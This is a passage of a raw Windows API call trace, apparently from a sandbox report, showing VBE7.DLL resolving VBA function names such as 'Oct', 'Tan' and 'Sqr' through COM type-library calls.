[1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ee0 | out: ppvObject=0x144ee0*=0x0) returned 0x80004002 [0068.403] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ed0 | out: ppvObject=0x144ed0*=0x0) returned 0x80004002 [0068.403] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ed8 | out: ppvObject=0x144ed8*=0x0) returned 0x80004002 [0068.404] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b528, ppTypeAttr=0x144f08, pDummy=0x10 | out: ppTypeAttr=0x144f08, pDummy=0x10) returned 0x0 [0068.404] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b528) returned 0x0 [0068.404] IUnknown:AddRef (This=0xaf0b528) returned 0x3 [0068.404] IUnknown:Release (This=0xaf0b528) returned 0x2 [0068.404] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.404] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.404] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.404] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.404] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.404] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.404] IUnknown:Release (This=0x665ba50) returned 0x7 [0068.404] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.404] strcpy_s (in: _Dst=0xafb5b10, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0068.404] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.404] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.404] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fb760 [0068.404] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.404] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.404] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.404] GetCurrentProcess () returned 0xffffffffffffffff [0068.404] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x43) returned 1 [0068.404] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.404] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x200) returned 0xaf17100 [0068.404] IMalloc:Alloc (This=0x7fefec05380, cb=0x318) returned 0x272e080 [0068.405] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Oct", lHashVal=0x10bdc0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2cea, cbMultiByte=4, lpWideCharStr=0x144ea0, cchWideChar=5 | out: lpWideCharStr="Oct") returned 4 [0068.405] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Oct", lHashVal=0x10bdc0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2cea, cbMultiByte=4, lpWideCharStr=0x144ea0, cchWideChar=5 | out: lpWideCharStr="Oct") returned 4 [0068.405] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Oct", lHashVal=0x10bdc0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.405] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0068.405] strcpy_s (in: _Dst=0x144e00, _DstSize=0x4, _Src="Oct" | out: _Dst="Oct") returned 0x0 [0068.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=4, lpWideCharStr=0x144c50, cchWideChar=4 | out: lpWideCharStr="Oct") returned 4 [0068.405] IUnknown:AddRef (This=0x665ba50) returned 0x8 [0068.405] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Oct", lHashVal=0x10bdc0, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=1, pBstrLibName=0x144c50) returned 0x0 [0068.405] IUnknown:Release (This=0x665ba50) returned 0x7 [0068.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Oct", cchWideChar=-1, lpMultiByteStr=0x144e00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oct", lpUsedDefaultChar=0x0) returned 4 [0068.405] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0068.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2cea, cbMultiByte=4, lpWideCharStr=0x144ea0, cchWideChar=5 | out: lpWideCharStr="Oct") returned 4 [0068.405] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Oct", lHashVal=0x10bdc0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.405] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d60 [0068.405] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d60) returned 0x0 [0068.405] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.405] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xb, _Src="_B_var_Oct" | out: _Dst="_B_var_Oct") returned 0x0 [0068.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=11, lpWideCharStr=0x144e00, cchWideChar=11 | out: lpWideCharStr="_B_var_Oct") returned 11 [0068.405] IUnknown:AddRef (This=0x665ba50) returned 0x8 [0068.405] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Oct", lHashVal=0x107ad1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=1, pBstrLibName=0x144e00) returned 0x0 [0068.405] IUnknown:Release (This=0x665ba50) returned 0x7 [0068.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Oct", cchWideChar=-1, lpMultiByteStr=0x144fb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Oct", lpUsedDefaultChar=0x0) returned 11 [0068.406] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.406] IUnknown:AddRef (This=0x665ba50) returned 0x8 [0068.406] IUnknown:Release (This=0x665ba50) returned 0x7 [0068.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc172e, cbMultiByte=11, lpWideCharStr=0x144e60, cchWideChar=12 | out: lpWideCharStr="_B_var_Oct") returned 11 [0068.406] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Oct", lHashVal=0x107ad1, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e18*=0xaf0b528, pDescKind=0x144e2c*=1, ppFuncDesc=0x144e30, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.406] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b528, ppTypeAttr=0x144e20, pDummy=0x1 | out: ppTypeAttr=0x144e20, pDummy=0x1) returned 0x0 [0068.406] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b528) returned 0x0 [0068.406] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf61420, cb=0x100) returned 0xaf543a0 [0068.406] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b240f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x144c80 | out: ppvObject=0x144c80*=0xaf0b528) returned 0x0 [0068.406] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xaf0b528, memid=1610612739, invkind=1, pFuncIndex=0x144cc0 | out: pFuncIndex=0x144cc0*=0x3) returned 0x0 [0068.406] ITypeInfo2:GetFuncCustData (in: This=0xaf0b528, index=0x3, GUID=0x7fee3b33758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x144cd8 | out: pVarVal=0x144cd8*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x107ad1)) returned 0x0 [0068.406] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.406] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.406] ITypeInfo:LocalReleaseFuncDesc (This=0xaf0b528) returned 0x0 [0068.406] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.406] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ed8 | out: ppvObject=0x144ed8*=0x0) returned 0x80004002 [0068.406] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.406] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.406] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.406] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.406] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.406] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.406] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.406] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.406] IUnknown:Release (This=0x665ba50) returned 0x8 [0068.406] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.407] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.407] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.407] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.407] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.407] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.407] GetCurrentProcess () returned 0xffffffffffffffff [0068.407] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x43) returned 1 [0068.407] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.407] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d60) returned 0x0 [0068.407] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.407] IUnknown:AddRef (This=0x665ba50) returned 0x9 [0068.407] IUnknown:Release (This=0x665ba50) returned 0x8 [0068.407] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.407] IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.407] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.407] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.407] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.407] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.407] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.407] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.407] IUnknown:Release (This=0x665ba50) returned 0x8 [0068.407] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.407] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.407] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.407] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Tan", lHashVal=0x10d82d, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0xaf0b6e0, pDescKind=0x144e6c*=1, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.408] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b6e0, ppTypeAttr=0x144e60, pDummy=0x1 | out: ppTypeAttr=0x144e60, pDummy=0x1) returned 0x0 [0068.408] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b6e0) returned 0x0 [0068.408] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf543a0, cb=0x200) returned 0xaf17310 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b240f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x144cc0 | out: ppvObject=0x144cc0*=0xaf0b6e0) returned 0x0 [0068.408] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xaf0b6e0, memid=1610612745, invkind=1, pFuncIndex=0x144d00 | out: pFuncIndex=0x144d00*=0x9) returned 0x0 [0068.408] ITypeInfo2:GetFuncCustData (in: This=0xaf0b6e0, index=0x9, GUID=0x7fee3b33758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x144d18 | out: pVarVal=0x144d18*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x10d82d)) returned 0x0 [0068.408] IUnknown:Release (This=0xaf0b6e0) returned 0x1 [0068.408] IUnknown:AddRef (This=0xaf0b6e0) returned 0x2 [0068.408] ITypeInfo:LocalReleaseFuncDesc (This=0xaf0b6e0) returned 0x0 [0068.408] IUnknown:Release (This=0xaf0b6e0) returned 0x1 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f88 | out: ppvObject=0x144f88*=0x0) returned 0x80004002 [0068.408] IUnknown:AddRef (This=0xaf0b6e0) returned 0x2 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f10 | out: ppvObject=0x144f10*=0x0) returned 0x80004002 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ee0 | out: ppvObject=0x144ee0*=0x0) returned 0x80004002 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ed0 | out: ppvObject=0x144ed0*=0x0) returned 0x80004002 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ed8 | out: ppvObject=0x144ed8*=0x0) returned 0x80004002 [0068.408] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b6e0, ppTypeAttr=0x144f08, pDummy=0x10 | out: ppTypeAttr=0x144f08, pDummy=0x10) returned 0x0 [0068.408] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b6e0) returned 0x0 [0068.408] IUnknown:AddRef (This=0xaf0b6e0) returned 0x3 [0068.408] IUnknown:Release (This=0xaf0b6e0) returned 0x2 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.408] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.408] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.409] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.409] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.409] IUnknown:Release (This=0x665ba50) returned 0xa [0068.409] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.409] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.409] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.409] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafb5f40 [0068.409] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.409] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.409] GetCurrentProcess () returned 0xffffffffffffffff [0068.409] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x3d) returned 1 [0068.409] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.409] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Sqr", lHashVal=0x10d528, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0xaf0b6e0, pDescKind=0x144e6c*=1, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.409] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b6e0, ppTypeAttr=0x144e60, pDummy=0x1 | out: ppTypeAttr=0x144e60, pDummy=0x1) returned 0x0 [0068.409] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b6e0) returned 0x0 [0068.409] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b240f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x144cc0 | out: ppvObject=0x144cc0*=0xaf0b6e0) returned 0x0 [0068.409] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xaf0b6e0, memid=1610612744, invkind=1, pFuncIndex=0x144d00 | out: pFuncIndex=0x144d00*=0x8) returned 0x0 [0068.409] ITypeInfo2:GetFuncCustData (in: This=0xaf0b6e0, index=0x8, GUID=0x7fee3b33758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x144d18 | out: pVarVal=0x144d18*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x10d528)) returned 0x0 [0068.409] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.409] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.410] ITypeInfo:LocalReleaseFuncDesc (This=0xaf0b6e0) returned 0x0 [0068.410] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.410] IUnknown:QueryInterface (in: This=0xaf0b6e0, 